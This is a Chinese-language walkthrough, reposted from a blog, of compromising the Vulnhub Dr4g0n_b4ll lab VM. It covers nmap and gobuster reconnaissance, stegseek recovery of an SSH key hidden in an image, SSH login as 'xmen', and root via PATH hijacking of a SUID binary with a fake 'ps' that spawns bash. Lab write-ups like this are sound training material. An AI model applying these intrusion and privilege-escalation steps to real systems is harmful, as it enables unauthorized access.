【Vulnhub系列】Vulnhub_Dr4g0n_b4ll 靶场渗透(原创)

【Vulnhub系列靶场】Vulnhub_Dr4g0n_b4ll靶场渗透

原文转载已经过授权

原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境搭建

选择打开.ovf 文件

配置名称和路径

打开后调整网络连接模式为【NAT】即可

二、信息收集

1、主机发现

复制代码
nmap.exe -sn 192.168.31.*

2、端口扫描

1、快速粗略的端口扫描

复制代码
nmap.exe -F 192.168.31.65

2、详细端口扫描

复制代码
nmap.exe -sT --min-rate 10000 -p- 192.168.31.65
nmap.exe -sU --min-rate 10000 -p- 192.168.31.65

3、详细扫描和漏洞探测

复制代码
nmap.exe -sV -A -p22,80 192.168.31.65
复制代码
nmap.exe --script=vuln -p22,80 192.168.31.65

只发现了一个robots.txt 的文件

3、web 目录探测

复制代码
gobuster.exe dir -u http://192.168.31.65 -w d:\theperson\dirs\dicc.txt -b 404,403 --no-error

4、web 框架探测

复制代码
whatweb http://192.168.31.65

三、获取shell立足点

1、查看敏感信息

1、主页

2、robots.txt 文件

进行base64解码:

3、源代码


2、DRAGON BALL目录信息

1、secret.txt 文件

保存下来做目录爆破

并无收获

2、Vulnhub 目录

3、Vulnhub/login.html:是一个虚假的登录页面

4、aj.jpg:一张黑客的图片

3、图片信息提取

提取图片隐写信息

复制代码
stegseek aj.jpg /usr/share/wordlists/rockyou.txt

4、获取shell 立足点

此时拿到一个ssh密钥,欠缺用户名,此处的xmen 是用户名

我们直接用密钥进行登录

复制代码
ssh xmen@192.168.31.65 -i id_rsa

成功拿到shell

四、提权至root

1、查看敏感文件

shell 是一个suid权限,发现可以执行环境变量中的ps 命令,那么可以尝试用环境变量劫持来提权

2、提权至root

复制代码
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd ~/script
./script

原文转载已经过授权

更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

相关推荐
迎風吹頭髮3 小时前
UNIX下C语言编程与实践58-UNIX TCP 连接处理:accept 函数与新套接字创建
c语言·网络·unix
毕设源码-郭学长5 小时前
【开题答辩全过程】以 安全培训信息管理平台为例,包含答辩的问题和答案
安全
猫头虎7 小时前
如何查看局域网内IP冲突问题?如何查看局域网IP环绕问题?arp -a命令如何使用?
网络·python·网络协议·tcp/ip·开源·pandas·pip
jieyu11198 小时前
网络、主机安全扫描工具
linux·安全·系统安全
FIN66689 小时前
昂瑞微冲刺科创板:创新驱动,引领射频芯片国产化新征程
前端·安全·前端框架·信息与通信·芯片
hello_25010 小时前
动手模拟docker网络-bridge模式
网络·docker·桥接模式
武文斌7710 小时前
项目学习总结:LVGL图形参数动态变化、开发板的GDB调试、sqlite3移植、MQTT协议、心跳包
linux·开发语言·网络·arm开发·数据库·嵌入式硬件·学习
爱吃喵的鲤鱼10 小时前
仿mudou——Connection模块(连接管理)
linux·运维·服务器·开发语言·网络·c++
爱吃小胖橘11 小时前
Unity网络开发--超文本传输协议Http(1)
开发语言·网络·网络协议·http·c#·游戏引擎
萧鼎11 小时前
Python schedule 库全解析:从任务调度到自动化执行的完整指南
网络·python·自动化